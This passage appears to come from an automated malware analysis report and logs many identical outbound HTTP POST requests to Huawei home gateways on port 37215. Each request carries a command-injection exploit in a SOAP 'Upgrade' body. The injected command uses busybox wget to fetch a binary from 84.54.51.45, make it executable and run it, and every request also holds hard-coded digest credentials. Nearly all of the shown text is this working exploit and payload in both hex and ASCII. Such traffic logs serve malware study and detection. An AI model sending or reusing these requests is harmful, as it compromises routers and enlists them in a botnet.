2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1875192.168.2.154325641.171.116.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599256992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1876192.168.2.154027241.89.249.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599284887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1877192.168.2.155059441.121.242.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599298000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1878192.168.2.153438441.88.172.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599328995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1879192.168.2.154899841.173.216.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599343061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1880192.168.2.153810641.164.135.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599354029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1881192.168.2.154997441.62.210.14637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599386930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1882192.168.2.153951641.91.239.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599397898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1883192.168.2.155601841.16.188.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599421978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1884192.168.2.154435841.65.141.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599461079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1885192.168.2.154965041.178.232.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599462986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
